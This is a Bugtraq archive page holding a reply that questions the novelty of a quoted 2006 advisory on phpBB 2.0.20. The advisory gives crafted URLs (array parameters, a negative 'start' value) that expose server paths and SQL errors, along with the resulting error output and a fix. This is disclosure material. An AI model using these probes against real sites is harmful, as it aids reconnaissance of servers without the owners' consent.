Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Re: phpBB 2.0.20 Full Path Disclosure and SQL Errors

From: Paul Laudanski <zx () castlecops com>
Date: Sun, 7 May 2006 22:49:27 -0400 (EDT)
You state these problems exist at php.net and elsewhere, so why is the 
subject titled phpbb?  php.net even recommends that for production sites 
displaying of errors is discouraged.  I'm unsure how your report brings 
anything new as you specify the valid use of debug and displaying of 
errors which are already well known.


On 5 May 2006 cxib () securityreason com wrote:


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[phpBB 2.0.20 Full Path Disclosure and SQL Errors]

Author: Maksymilian Arciemowicz (cXIb8O3)
Date:
- -Written: 1.5.2006
- -Public: 5.5.2006

from SecurityReason.Com
CVE:
- - CVE-2006-2219 Full Path Disclosure
- - CVE-2006-2220 Sql Errors

- --- 0.Description ---
phpBB is a high powered, fully scalable, and highly customizable Open Source bulletin board package. phpBB has a

user-friendly interface, simple and straightforward administration panel, and helpful FAQ. Based on the powerful PHP

server language and your choice of MySQL, MS-SQL, PostgreSQL or Access/ODBC database servers, phpBB is the ideal

free community solution for all web sites.
Contact with author http://www.phpbb.com/about.php.

- --- 1. Full Path Disclosure ---
Many scripts, for example phpBB, have a basic bug. It exists in variables, which are being inserted into script, into 
specific functions. For example function htmlspecialchars()

...
      if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "s|ls", &str, &str_len, &quote_style, &hint_charset, 
&hint_charset_len) == FAILURE) {
              return;
      }
...

As you can see there is a protection from formatting input variable. If the variable is other than string, we have 
error with Full Path Disclosure.

Example:

http://[HOST]/2020/phpBB2/memberlist.php?mode[]=cx

- ---Code ---
if ( isset($HTTP_GET_VARS['mode']) || isset($HTTP_POST_VARS['mode']) )
{
      $mode = ( isset($HTTP_POST_VARS['mode']) ) ? htmlspecialchars($HTTP_POST_VARS['mode']) : 
htmlspecialchars($HTTP_GET_VARS['mode']);
}
else
{
      $mode = 'joined';
}
- ---Code ---

- ---Result ---
Warning: htmlspecialchars() expects parameter 1 to be string, array given in /www/2020/phpBB2/memberlist.php on line 
40

Warning: Cannot modify header information - headers already sent by (output started at 
/www/2020/phpBB2/memberlist.php:40) in /www/2020/phpBB2/includes/page_header.php on line 483

Warning: Cannot modify header information - headers already sent by (output started at 
/www/2020/phpBB2/memberlist.php:40) in /www/2020/phpBB2/includes/page_header.php on line 485

Warning: Cannot modify header information - headers already sent by (output started at 
/www/2020/phpBB2/memberlist.php:40) in /www/2020/phpBB2/includes/page_header.php on line 486
- ---Result ---

http://[HOST]/2020/phpBB2/viewtopic.php?t=2&highlight[]=cx

- ---Result ---
Warning: htmlspecialchars() expects parameter 1 to be string, array given in /www/2020/phpBB2/viewtopic.php on line 
487

Warning: urlencode() expects parameter 1 to be string, array given in /www/2020/phpBB2/viewtopic.php on line 498

Warning: Cannot modify header information - headers already sent by (output started at 
/www/2020/phpBB2/viewtopic.php:487) in /www/2020/phpBB2/includes/page_header.php on line 483

Warning: Cannot modify header information - headers already sent by (output started at 
/www/2020/phpBB2/viewtopic.php:487) in /www/2020/phpBB2/includes/page_header.php on line 485

Warning: Cannot modify header information - headers already sent by (output started at 
/www/2020/phpBB2/viewtopic.php:487) in /www/2020/phpBB2/includes/page_header.php on line 486
- ---Result ---

Problem appears if display_errors==1, but it exists on many websites. (even at php.net).

- --- 2. Sql Errors ---

Problem appears because we can add everything (INT) to the end of SQL query (LIMIT). The query will fail if the value 
is below 0 or above -2^32.

Example:

http://[HOST]/2020/phpBB2/memberlist.php?start=-1

- ---Code ---
$start = ( isset($HTTP_GET_VARS['start']) ) ? intval($HTTP_GET_VARS['start']) : 0;
- ---Code ---

- ---Result ---
Could not query users

DEBUG MODE

SQL Error : 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version 
for the right syntax to use near '-1, 50' at line 4

SELECT username, user_id, user_viewemail, user_posts, user_regdate, user_from, user_website, user_email, user_icq, 
user_aim, user_yim, user_msnm, user_avatar, user_avatar_type, user_allowavatar FROM phpbb_users WHERE user_id <> -1 
ORDER BY user_regdate ASC LIMIT -1, 50

Line : 151
File : memberlist.php
- ---Result ---

- --- 3. How to fix ---
Turn off display_errors or use function like is_string().

- --- 4. Greets ---
sp3x

Infospec, p_e_a, krasza, revival, l5x

- --- 5. Contact ---
Author: SecurityReason.Com [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
SecurityReason.Com
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2.2 (FreeBSD)

iD8DBQFEW4pi3Ke13X/fTO4RAqV7AJ9PeZ9nbRUYATqArEzLOdenG1ypHwCguPa5
7DlqP3M3vq1frb7Zc3y+KrU=
=4U6Y
-----END PGP SIGNATURE-----



-- 
Paul Laudanski, Microsoft MVP Windows-Security
[de] http://de.castlecops.com
[en] http://castlecops.com
[wiki] http://wiki.castlecops.com
[family] http://cuddlesnkisses.com

[This message is for the designated recipient(s) only and may contain
privileged or confidential information.  If you have received it in error,
please notify the sender immediately and delete the original. Any other
use of the email by you is prohibited.]
Previous By Date Next
Previous By Thread Next

Current thread: